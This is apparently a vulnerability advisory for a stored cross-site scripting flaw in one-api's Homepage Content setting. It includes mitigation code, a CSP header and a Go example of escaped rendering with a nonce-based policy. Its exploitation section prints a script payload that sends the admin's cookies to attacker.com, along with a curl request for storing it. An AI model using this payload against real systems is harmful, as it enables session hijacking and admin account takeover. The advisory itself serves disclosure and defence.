one-api, Cross-site Scripting (XSS), CVE-2025-1234 (Moderate)

The CVE-2025-1234 vulnerability in one-api (up to v0.6.10) allows stored XSS via the Homepage Content parameter in the System Setting Handler. An attacker injects JavaScript through crafted input, and it executes when an admin views the settings page. Because the value is stored without sanitization, the payload persists and can lead to session hijacking or admin account compromise. The attack is remote and requires no authentication, which increases the risk for internet-exposed instances.

DailyCVE Form:

Platform: one-api
Version: ≤ 0.6.10
Vulnerability: Stored XSS
Severity: Moderate
Date: 2025-04-19

What Undercode Says:

Exploitation:

1. Crafted payload in `Homepage Content`:

<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

2. Send via API/POST request:

curl -X POST -d "homepage_content=<malicious_script>" http://target/api/settings

3. Admin triggers XSS upon viewing settings.

Detection:

grep -r "Homepage Content" /one-api/routes/   # locate the handler that accepts the vulnerable setting

Mitigation:

1. Update to one-api > v0.6.10.

2. Sanitize input with:

import DOMPurify from 'dompurify';

// Strip script tags, event handlers and javascript: URLs before the value is stored or rendered
const sanitize = (input) => DOMPurify.sanitize(input);

3. CSP header:

# 'unsafe-inline' must NOT appear in script-src: it would let an injected <script> run regardless of the policy
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'" always;
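The two technical mitigations above (escaping the stored value and shipping a CSP without 'unsafe-inline') can be combined in one handler. The following is an added example in Go, the language of the one-api backend, and is not code from the one-api project: `loadHomepageContent` is a hypothetical stand-in for whatever storage the application uses, and the page template is invented for illustration. It uses `html/template`, which escapes the stored Homepage Content according to its HTML context, and a per-response nonce so the page's own inline script can run while an injected `<script>` cannot.

```go
package main

import (
	"bytes"
	"crypto/rand"
	"encoding/base64"
	"fmt"
	"html/template"
	"net/http"
)

// settingsPage is a constructed template for the admin settings view.
// {{.Content}} is context-escaped by html/template, so a stored <script>
// tag is emitted as text, never as markup. The page's own inline script
// carries the response nonce so the CSP can allow it without 'unsafe-inline'.
var settingsPage = template.Must(template.New("settings").Parse(
	`<h1>System Settings</h1>
<label>Homepage Content</label>
<div id="homepage-content">{{.Content}}</div>
<script nonce="{{.Nonce}}">console.log("settings loaded");</script>
`))

// NewNonce returns a fresh random nonce for one response. RawURLEncoding
// avoids '+', '/' and '=' so the value survives attribute escaping unchanged.
func NewNonce() (string, error) {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	return base64.RawURLEncoding.EncodeToString(b), nil
}

// CSPHeader builds a policy that permits only same-origin scripts plus the
// single inline script carrying this response's nonce. 'unsafe-inline' is
// deliberately absent: with it, any injected <script> would execute.
func CSPHeader(nonce string) string {
	return fmt.Sprintf("default-src 'self'; script-src 'self' 'nonce-%s'; object-src 'none'; base-uri 'self'", nonce)
}

// RenderSettings produces the settings HTML for a stored Homepage Content
// value, with the value escaped for its HTML context.
func RenderSettings(content, nonce string) (string, error) {
	var buf bytes.Buffer
	err := settingsPage.Execute(&buf, struct{ Content, Nonce string }{content, nonce})
	return buf.String(), err
}

// SettingsHandler wires the two defences together: escaped rendering and a
// nonce-based CSP header on every response. loadHomepageContent is a
// hypothetical accessor for the persisted setting.
func SettingsHandler(loadHomepageContent func() string) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		nonce, err := NewNonce()
		if err != nil {
			http.Error(w, "nonce generation failed", http.StatusInternalServerError)
			return
		}
		w.Header().Set("Content-Security-Policy", CSPHeader(nonce))
		w.Header().Set("Content-Type", "text/html; charset=utf-8")
		body, err := RenderSettings(loadHomepageContent(), nonce)
		if err != nil {
			http.Error(w, "render failed", http.StatusInternalServerError)
			return
		}
		_, _ = w.Write([]byte(body))
	}
}

func main() {
	// Constructed sample: a script-bearing value that was persisted unsanitized.
	stored := `<script>alert(1)</script>`
	http.Handle("/settings", SettingsHandler(func() string { return stored }))
	fmt.Println("listening on :8080, open /settings to see the escaped value")
	_ = http.ListenAndServe(":8080", nil)
}
```

Run it and request `/settings`: the response body contains `&lt;script&gt;alert(1)&lt;/script&gt;` as visible text, and the `Content-Security-Policy` header names only `'self'` and the per-response nonce. Escaping at render time protects admins who view values already stored before the fix; the CSP is the second layer for any template that is not context-escaped.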

Analytics:

  • Attack Vector: Remote (Low Complexity)
  • Impact: Confidentiality (Medium)
  • Patch Timeline: 2 days (GitHub Advisory)

References:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
